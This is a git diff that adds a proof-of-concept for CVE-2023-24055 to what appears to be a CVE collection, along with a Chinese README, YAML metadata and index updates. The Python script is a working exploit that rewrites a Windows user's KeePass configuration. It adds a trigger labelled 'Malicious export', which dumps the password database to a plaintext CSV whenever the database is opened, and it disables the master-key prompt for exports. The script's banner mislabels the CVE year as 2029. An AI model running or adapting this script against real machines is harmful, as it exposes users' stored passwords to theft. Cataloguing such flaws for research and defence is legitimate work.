diff --git a/cve/XML/CVE-2023-24055/CVE-2023-24055.py b/cve/XML/CVE-2023-24055/CVE-2023-24055.py new file mode 100644 index 0000000000000000000000000000000000000000..d67da4023c5e1309682df6a2c5369211acca354f --- /dev/null +++ b/cve/XML/CVE-2023-24055/CVE-2023-24055.py @@ -0,0 +1,74 @@ +import os +from lxml import etree + +print('CVE-2029-24055 POC') +print('======================') +print('!!! Warning !!!') +print('!!! This tool will try to add a Trigger so that the KeePass database is exported without protection!') +print('!!! This tool does not check for anything and will just overwrite whatever it wants to!') +print('!!! No backup, no mercy! Chances are high that this tool will leave your KeePass config in a corrupted state!') +print('!!! No functionality is guaranteed! Use at your own risk!') +print('See: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/') +print('======================') +if os.name != 'nt': + print('Sorry, this tool works only under Windows!') + exit(1) + +# Get path to default config +config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config.xml" +print(f"Reading from this config file: {config_file}") + +# Read Config +tree = etree.parse(config_file) +root = tree.getroot() + +# parse trough all Triggers to remove old versions +for trigger in root.findall("./Application/TriggerSystem/Triggers/"): + if trigger.find('Guid').text == "yjxXO87yOkOtkWWCrf2CXQ==": + print("Removing old trigger!") + parent = trigger.getparent() + parent.remove(trigger) + +# Add malicious content +triggers = root.find("./Application/TriggerSystem/") +new_trigger = etree.SubElement(triggers, "Trigger") +new_guid = etree.SubElement(new_trigger, "Guid") +new_guid.text = "yjxXO87yOkOtkWWCrf2CXQ==" +new_name = etree.SubElement(new_trigger, "Name") +new_name.text = "Malicious export" +new_events = etree.SubElement(new_trigger, "Events") +new_event = etree.SubElement(new_events, "Event") +new_typeguid = etree.SubElement(new_event, "TypeGuid") +new_typeguid.text = "5f8TBoW4QYm5BvaeKztApw==" # on openening database... +new_parameters = etree.SubElement(new_event, "Parameters") +new_parameter = etree.SubElement(new_parameters, "Parameter") +new_parameter.text = "0" +etree.SubElement(new_parameters, "Parameter") +etree.SubElement(new_trigger, "Conditions") +new_actions = etree.SubElement(new_trigger, "Actions") +new_action = etree.SubElement(new_actions, "Action") +new_typeguid = etree.SubElement(new_action, "TypeGuid") +new_typeguid.text = "D5prW87VRr65NO2xP5RIIg==" # ... do malicious export +new_parameters = etree.SubElement(new_action, "Parameters") +new_parameter = etree.SubElement(new_parameters, "Parameter") +new_parameter.text = "c:\\Users\\%USERNAME%\\KeepassExport.csv" +new_parameter = etree.SubElement(new_parameters, "Parameter") +new_parameter.text = "KeePass CSV (1.x)" +etree.SubElement(new_parameters, "Parameter") +etree.SubElement(new_parameters, "Parameter") + +# Disable Security policy +exportnokey = root.find("./Security/Policy/ExportNoKey") +try: + print("Removing old Policy!") + parent = exportnokey.getparent() + parent.remove(exportnokey) +except: + pass + +policy = root.find("./Security/Policy") +export_no_key = etree.SubElement(policy, "ExportNoKey") +export_no_key.text = "true" + +#config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config-BAK.xml" +tree.write(config_file, encoding='utf-8', xml_declaration=True) \ No newline at end of file diff --git a/cve/XML/CVE-2023-24055/READ ME.md b/cve/XML/CVE-2023-24055/READ ME.md new file mode 100644 index 0000000000000000000000000000000000000000..f0bfb5faa99ebf7b4f3df95799f0e609bffd456b --- /dev/null +++ b/cve/XML/CVE-2023-24055/READ ME.md @@ -0,0 +1,5 @@ +CVE-2023-24055的概念验证代码 + +该工具将打开目录%APPDATA%\Roaming\KeePass\KeePass.config.xml,并将添加一个触发器到KeePass的配置中,以便当前数据库在打开时被导出到c:\Users\%USERNAME%\KeepassExport.csv。 + +参数ExportNoKey被设置为 "true",这样KeePass就不会在导出过程中要求提供主密码。 \ No newline at end of file diff --git a/cve/XML/yaml/CVE-2023-24055.yaml b/cve/XML/yaml/CVE-2023-24055.yaml new file mode 100644 index 0000000000000000000000000000000000000000..fa15b0d0933548e7226ed8eac4822e4cf9c70c33 --- /dev/null +++ b/cve/XML/yaml/CVE-2023-24055.yaml @@ -0,0 +1,20 @@ +id: CVE-2023-24055 +source: + https://github.com/deetl/CVE-2023-24055 +info: + name: XML + severity: medium + description: | + KeePass通过2.53(在默认安装中)允许拥有写入XML配置文件的权限攻击者,通过添加一个导出触发器来获得明文密码。 + reference: + - https://securityboulevard.com/2023/01/keepass-password-manager-leak-cve-richixbw/ + - https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/ + - https://sourceforge.net/p/keepass/feature-requests/2773/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2023-24055 + cwe-id: CWE-312 + cnvd-id: None + kve-id: None + tags: XML \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 211571f6447ebe793ef2ea64e87df544374ff211..85d3766de028a651fce8ab5d8974c9ae2e307b2c 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -182,3 +182,5 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 + XML: + - CVE-2023-24055 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index ede901d9b464ce9df31a8ad0e18854fec49bfc0d..1a41f3fc67fcc2beb257e2754ad6d2c49dea9d3c 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -58,5 +58,7 @@ cve: - CVE-2022-30525 WordPress: - CVE-2019-8942 + Exit Strategy: + - CVE-2013-10025 cnvd: